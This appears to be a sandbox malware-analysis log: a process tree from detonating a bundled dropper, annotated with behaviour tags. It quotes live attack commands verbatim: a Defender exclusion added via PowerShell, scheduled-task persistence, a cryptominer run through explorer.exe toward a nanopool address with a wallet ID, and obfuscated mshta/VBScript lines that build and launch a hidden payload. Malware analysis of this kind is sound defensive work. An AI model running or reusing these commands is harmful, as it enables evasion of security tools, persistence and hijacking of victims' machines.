PID 4136 wrote to memory of 3532	4136	cmd.exe	powershell.exe
PID 4136 wrote to memory of 3532	4136	cmd.exe	powershell.exe
PID 4136 wrote to memory of 3532	4136	cmd.exe	powershell.exe
PID 4844 wrote to memory of 864	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 864	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 864	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 3204	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 3204	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 3204	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 1076	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 1076	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 1076	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 3640	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 3640	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 3640	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 1172	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 1172	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 1172	4844	setup_install.exe	cmd.exe
PID 3024 wrote to memory of 1176	3024	cmd.exe	Fri15364050134.exe
PID 3024 wrote to memory of 1176	3024	cmd.exe	Fri15364050134.exe
PID 3024 wrote to memory of 1176	3024	cmd.exe	Fri15364050134.exe
PID 3048 wrote to memory of 1112	3048	cmd.exe	Fri15cf751fee90f2.exe
PID 3048 wrote to memory of 1112	3048	cmd.exe	Fri15cf751fee90f2.exe
PID 3048 wrote to memory of 1112	3048	cmd.exe	Fri15cf751fee90f2.exe
PID 4844 wrote to memory of 5052	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 5052	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 5052	4844	setup_install.exe	cmd.exe
PID 4872 wrote to memory of 5036	4872	cmd.exe	Fri15d3a9f0cbde1.exe
PID 4872 wrote to memory of 5036	4872	cmd.exe	Fri15d3a9f0cbde1.exe
PID 4872 wrote to memory of 5036	4872	cmd.exe	Fri15d3a9f0cbde1.exe
PID 4844 wrote to memory of 4760	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 4760	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 4760	4844	setup_install.exe	cmd.exe
PID 3032 wrote to memory of 3884	3032	cmd.exe	Fri158ea592d6f.exe
PID 3032 wrote to memory of 3884	3032	cmd.exe	Fri158ea592d6f.exe
PID 3032 wrote to memory of 3884	3032	cmd.exe	Fri158ea592d6f.exe
PID 4844 wrote to memory of 4940	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 4940	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 4940	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 4012	4844	setup_install.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4012

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4776

C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious use of WriteProcessMemory
PID:4136

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri15cf751fee90f2.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3048

C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri15cf751fee90f2.exe
Fri15cf751fee90f2.exe
5⤵
- Executes dropped EXE
PID:1112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 244
6⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5444

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri15364050134.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3024

C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri15364050134.exe
Fri15364050134.exe
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 1824
6⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 2084
6⤵
- Program crash
PID:6928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 2064
6⤵
- Program crash
PID:6956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 2120
6⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri15d3a9f0cbde1.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4872

C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri15d3a9f0cbde1.exe
Fri15d3a9f0cbde1.exe
5⤵
- Executes dropped EXE
PID:5036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 312
6⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri156c10dd46.exe
4⤵
PID:4388

C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri156c10dd46.exe
Fri156c10dd46.exe
5⤵
- Executes dropped EXE
PID:4628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri155e6d4468.exe
4⤵
PID:864

C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri155e6d4468.exe
Fri155e6d4468.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4732

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
- Executes dropped EXE
PID:5904

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
7⤵
- Executes dropped EXE
PID:5484

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
8⤵
PID:6736

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
9⤵
- Executes dropped EXE
- Creates scheduled task(s)
PID:5628

C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7124

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
9⤵
PID:6236

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
10⤵
- Creates scheduled task(s)
PID:6612

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
9⤵
- Executes dropped EXE
PID:5256

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
9⤵
PID:4724

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:340

C:\ProgramData\7913749.exe
"C:\ProgramData\7913749.exe"
8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3824

C:\ProgramData\381807.exe
"C:\ProgramData\381807.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:1856

C:\ProgramData\3148703.exe
"C:\ProgramData\3148703.exe"
8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3148

C:\ProgramData\8360833.exe
"C:\ProgramData\8360833.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3840

C:\ProgramData\8360833.exe
"C:\ProgramData\8360833.exe"
9⤵
- Executes dropped EXE
PID:5144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 1088
9⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5200

C:\ProgramData\7963055.exe
"C:\ProgramData\7963055.exe"
8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3756

C:\ProgramData\1421519.exe
"C:\ProgramData\1421519.exe"
8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5956

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
7⤵
- Executes dropped EXE
PID:4936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 608
8⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5820

C:\Users\Admin\AppData\Local\Temp\4.exe
"C:\Users\Admin\AppData\Local\Temp\4.exe"
7⤵
PID:2328

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
8⤵
- Executes dropped EXE
PID:1016

C:\Users\Admin\AppData\Local\Temp\udptest.exe
"C:\Users\Admin\AppData\Local\Temp\udptest.exe"
7⤵
- Executes dropped EXE
PID:1696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 320
8⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6260

C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
7⤵
PID:5628

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6136

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
9⤵
PID:1192

C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
10⤵
- Executes dropped EXE
PID:5024

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
11⤵
PID:2892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
12⤵
PID:5376

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )
11⤵
PID:6728

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
12⤵
PID:6860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
13⤵
PID:660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
13⤵
PID:5348

C:\Windows\SysWOW64\control.exe
control ..\kZ_AmsXL.6G
13⤵
PID:6296

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
14⤵
- Loads dropped DLL
PID:5072

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
15⤵
PID:5824

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
16⤵
- Loads dropped DLL
PID:5156

C:\Windows\SysWOW64\taskkill.exe
taskkill -f /Im "sfx_123_206.exe"
10⤵
- Kills process with taskkill
PID:860

C:\Users\Admin\AppData\Local\Temp\6.exe
"C:\Users\Admin\AppData\Local\Temp\6.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4660

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
8⤵
- Executes dropped EXE
PID:4172

C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecorderF20.exe
"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecorderF20.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5600

C:\Users\Admin\AppData\Local\Temp\tmp6760_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp6760_tmp.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1524

C:\Users\Admin\AppData\Local\Temp\tmp6760_tmp.exe
C:\Users\Admin\AppData\Local\Temp\tmp6760_tmp.exe
9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:4712

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
7⤵
PID:8

C:\Users\Admin\AppData\Local\Temp\is-DTFAT.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DTFAT.tmp\setup_2.tmp" /SL5="$10296,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6128

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
9⤵
- Executes dropped EXE
PID:5708

C:\Users\Admin\AppData\Local\Temp\is-K04KV.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-K04KV.tmp\setup_2.tmp" /SL5="$202AA,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
10⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:1120

C:\Users\Admin\AppData\Local\Temp\tingwang-game.exe
"C:\Users\Admin\AppData\Local\Temp\tingwang-game.exe"
7⤵
- Executes dropped EXE
PID:4004

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
7⤵
- Executes dropped EXE
PID:5420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri15c47a7c807b12d1.exe
4⤵
PID:1076

C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri15c47a7c807b12d1.exe
Fri15c47a7c807b12d1.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4784

C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri15c47a7c807b12d1.exe
C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri15c47a7c807b12d1.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri1586c2482e5c8a45.exe
4⤵
PID:3640

C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri1586c2482e5c8a45.exe
Fri1586c2482e5c8a45.exe
5⤵
- Executes dropped EXE
PID:4676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 244
6⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri1503acc0996b574.exe
4⤵
PID:4760

C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri1503acc0996b574.exe
Fri1503acc0996b574.exe
5⤵
- Executes dropped EXE
PID:5152

C:\Users\Admin\AppData\Local\Temp\is-T1SQT.tmp\Fri1503acc0996b574.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T1SQT.tmp\Fri1503acc0996b574.tmp" /SL5="$701FE,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri1503acc0996b574.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5404

C:\Users\Admin\AppData\Local\Temp\is-M3K9H.tmp\EtalevzaJet.exe
"C:\Users\Admin\AppData\Local\Temp\is-M3K9H.tmp\EtalevzaJet.exe" /S /UID=burnerch2
7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:5664

C:\Program Files\Windows Mail\VCVXFMUOAJ\ultramediaburner.exe
"C:\Program Files\Windows Mail\VCVXFMUOAJ\ultramediaburner.exe" /VERYSILENT
8⤵
- Executes dropped EXE
PID:7092

C:\Users\Admin\AppData\Local\Temp\is-LGM25.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LGM25.tmp\ultramediaburner.tmp" /SL5="$4028C,281924,62464,C:\Program Files\Windows Mail\VCVXFMUOAJ\ultramediaburner.exe" /VERYSILENT
9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:6152

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2328

C:\Users\Admin\AppData\Local\Temp\3b-6ed97-b0d-d01a6-b05b496e58ec9\SHimenibasi.exe
"C:\Users\Admin\AppData\Local\Temp\3b-6ed97-b0d-d01a6-b05b496e58ec9\SHimenibasi.exe"
8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:1260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
9⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
PID:6040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac5946f8,0x7ffcac594708,0x7ffcac594718
10⤵
PID:5184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
10⤵
- Executes dropped EXE
PID:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
10⤵
PID:6184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
10⤵
PID:664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
10⤵
PID:5952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
10⤵
PID:5336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:1
10⤵
PID:6452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1
10⤵
- Suspicious use of AdjustPrivilegeToken
PID:860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:1
10⤵
PID:6852

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3884 /prefetch:8
10⤵
PID:2008

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3884 /prefetch:8
10⤵
PID:1492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3776 /prefetch:1
10⤵
PID:5428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5344 /prefetch:2
10⤵
PID:3324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2088,6545682520833856319,15616240809828876163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1956 /prefetch:8
10⤵
PID:5028

